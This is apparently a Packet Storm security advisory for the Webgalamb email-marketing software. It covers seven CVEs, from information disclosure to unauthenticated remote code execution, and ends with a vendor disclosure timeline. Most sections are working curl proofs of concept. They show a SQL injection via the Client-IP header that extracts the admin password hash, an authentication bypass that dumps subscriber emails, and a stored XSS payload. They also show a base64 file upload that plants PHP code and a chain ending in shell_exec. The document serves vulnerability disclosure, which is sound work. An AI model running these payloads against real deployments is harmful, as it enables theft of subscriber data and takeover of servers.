what you don't know can hurt you

Webgalamb Information Disclosure / XSS / CSRF / SQL Injection

Webgalamb Information Disclosure / XSS / CSRF / SQL Injection
Posted Jan 7, 2019
Authored by Daniel Jones

Webgalamb suffers from remote code execution, cross site request forgery, cross site scripting, information leakage, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, code execution, xss, sql injection, info disclosure, csrf
advisories | CVE-2018-19509, CVE-2018-19510, CVE-2018-19511, CVE-2018-19512, CVE-2018-19513, CVE-2018-19514, CVE-2018-19515
MD5 | 1c993ff1caf37847e75ec6a54088c49a

Webgalamb Information Disclosure / XSS / CSRF / SQL Injection

Change Mirror Download

Vendor: E.N.S. Zrt (www.ens.hu)
Product: Webgalamb (www.webgalamb.hu, www.facebook.com/webgalamb)

Webgalamb is a commercial email marketing software for managing subscription lists and sending out bulk emails. It is not SaaS but a PHP based web application that is typically hosted next to the company website of Webgalamb customers.

Webgalamb is prone to be vulnerable to multiple security flaws that could be exploited by threat actors to take over the complete control of Webgalamb deployments, company websites and also to exfiltrate the email subscription databases.

The findings had been verified with latest Webgalamb versions (v6 and v7), older versions are probably also affected. The vendor confirmed the vulnerabilities but the remediation plan was not shared.

CVE-2018-19513 Information disclosure

The log files created by the application are exposed to the internet. The file names are predictable. For example:


The logfile could contain sensitive client data (email addresses) and also facilitates exploitation of SQL injection errors.

CVE-2018-19510: SQL injection in insert via Client-IP HTTP header

curl -d "mail=test2@test.tt&save=1" --header "Client-Ip: 'foo" -v "http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83"

In the SQL log:
2018-10-25 18:06:38 - Url: http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83

Bad SQL:[insert into `wg7_users` ( mail, omail, mail_id, ip, ip_orig, datum, verify_code, active, g, a, ipdatum ) values

( 'test2@test.tt', 'test2@test.tt', '3', ''foo', ''foo', CURDATE(), 'k7k64a8kk71811fcb841k71k1f5ffda16ec96eff', '1', '1', '1', now() )]/You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'foo', ''foo', CURDATE(), 'k7k64a8kk71811fcb841k71k1f5ffda16ec96eff', '1', '1', '' at line 2 : (c:\htdocs\webgalamb\subscriber.php:2241)

Example of a meaningful SQL injection:

curl -d "mail=test4@test.tt&save=1" --header "Client-Ip: ', 5,CURDATE(), 7, 1,9,10, now()), ((SELECT GROUP_CONCAT(conf_value) FROM wg7_config),2,3,4,5,CURDATE(),7,8,65535,1,NOW()) -- foo" -v "http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83"

An UPDATE wg7_users SQL expression is also vulnerable to the same pattern; it is possible to modify any user subscriptions.

CVE-2018-19515: Authentication bypass

The system/ajax.php script offers various functionality, which is supposed to be available for the administrator of the system only.
However, by using one of the bgsend, atment_sddd1xGz or the xls_bgimport query parameters, most of these methods become available.

For exploitation, see the next examples.

Dumping the database (email addresses of subscribed users), without authentication:

curl -d "uidselect=&g=1" http://www.victim.tld/webgalamb/system/ajax.php?atment_sddd1xGz=1

<a href="#" onclick="$('#un').val('test@test.tt '); $('#u_ID').val('1'); return false;">test@test.tt</a>

Combining the vulnerabilities above it is possible to exfiltrate any data from the system:

curl -d "uidselect=&g=65535" http://www.victim.tld/webgalamb/system/ajax.php?atment_sddd1xGz=1

<a href="#" onclick="$('#un').val('*4AD47E08DAE2BD4F0977EED5D23DC901359DF617,webgalamb/,0,,7.0.0,0,50,foo@foo.fo,foo@foo.fo,2018-10-23,,,,200,300,2018.10.23. 18:15:49,www.victim.tld,10000,0,0,80,30,0,2018-10-23,0,,g_admin,15000,500,5,,,,,,,,,,,,,0, '); $('#u_ID').val('14'); return false;">*4AD47E08DAE2BD4F0977EED5D23DC901359DF617,webgalamb/,0,,7.0.0,0,50,foo@foo.fo,foo@foo.fo,2018-10-23,,,,200,300,2018.10.23. 18:15:49,www.victim.tld,10000,0,0,80,30,0,2018-10-23,0,,g_admin,15000,500,5,,,,,,,,,,,,,0,</a>

Note, the response above in this case contains the result of the previously executed config group concat action of wg7_config table, which also includes the password of the administrator (stored via MySQL's PASSWORD() function).

CVE-2018-19509: Persistent XSS, targeting the administrator

The Webgalamb application seems to make some opportunistic calls to htmlspecialchars() instead of using any templating engines with proper contextual encoding.
Since it is possible to insert arbitrary strings to the database, any JavaScripts could be executed by the administrator.

curl -d "mail=test5@test.tt&save=1" --header "Client-Ip: ', 5,CURDATE(), 7, 1,9,10, now()), (char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,60,47,115,99,114,105,112,116,62),2,3,4,5,CURDATE(),7,8,1,1,NOW()) -- foo" -v "http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83"

<h2><script>alert(document.domain)</script> feliratkozA3 adatai</h2>

The same XSS attack could be mounted via another entry points as well.

CVE-2018-19511: CSRF

The application does not feature any security measures to prevent CSRF attacks.
An external, attacker controlled site could submit a POST HTTP request to http://www.victim.tld/webgalamb/wg7.php?options=1 in the context of an authenticated administrator to change the administrator password and take over the control of a Webgalamb installation.

CVE-2018-19512: Arbitrary code execution (as authenticated administrator)

curl -v --header "Cookie: PHPSESSID=762b286eef672d9b618894b7f47a20ca; webgalamb6=3s4kcr7r7r5i47e68002r7ofn5" -F "file=@test-exploit.wgx" http://www.victim.tld/webgalamb/system/ajax.php?wgmfile=1

Where test-exploit.wgx is:
@WGMX PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48d2d4PjxpbWFnZXM+PGltYWdlPjxuYW1lPi4uL3B3bmQucGhwPC9uYW1lPjxmaWxlPlBEOXdhSEFLY0dod2FXNW1ieWdwT3dvL1BnPT08L2ZpbGU+PC9pbWFnZT48L2ltYWdlcz48L3dneD4=

The code then can be executed via the following HTTP call:


CVE-2018-19514 Arbitrary remote code execution without authentication

Uploading a CSV file:

curl -v -F "file=@import.csv" -F "g=1" "http://www.victim.tld/webgalamb/system/ajax.php?import_fupl=1&atment_sddd1xGz=1"

It is placed here:


Processing the file and inserting its lines to the wg7_import table:

curl -v --header "Cookie: webgalamb6=pid" -d "xls_converz=1" -d "g=1" -d "exp=.csv" "http://www.victim.tld/webgalamb/system/ajax.php?atment_sddd1xGz=1"

Processing it (inserting the data to the fields table):

curl -v "http://www.victim.tld/webgalamb/system/ajax.php?xls_bgimport=1&pid=pid&g=1&X=0&Y=0"

The exploit payload looks like this (import.csv):


After it was processed, arbitrary commands can be executed via the subscription form:

curl -d "mail=test1@test.tt&save=1" --header "C: die(phpinfo());" -v "http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83"
curl -d "mail=test1@test.tt&save=1" --header "C: die(shell_exec('whoami'));" -v "http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83"

10/27/2018: Initial contact attempt with the vendor
10/31/2018: Second attempt with additional email addresses
10/31/2018: Initial feedback from the vendor, confirming the channel is appropriate for receiving the report
10/31/2018: Report submitted
11/12/2018: Ping
11/12/2018: Webgalamb acknowledging the vulnerabilities
11/12/2018: Communicating planned date of public disclosure once again

Login or Register to add favorites

File Archive:

August 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    3 Files
  • 2
    Aug 2nd
    2 Files
  • 3
    Aug 3rd
    32 Files
  • 4
    Aug 4th
    22 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    6 Files
  • 8
    Aug 8th
    1 Files
  • 9
    Aug 9th
    2 Files
  • 10
    Aug 10th
    27 Files
  • 11
    Aug 11th
    11 Files
  • 12
    Aug 12th
    11 Files
  • 13
    Aug 13th
    17 Files
  • 14
    Aug 14th
    7 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2020 Packet Storm. All rights reserved.

Security Services
Hosting By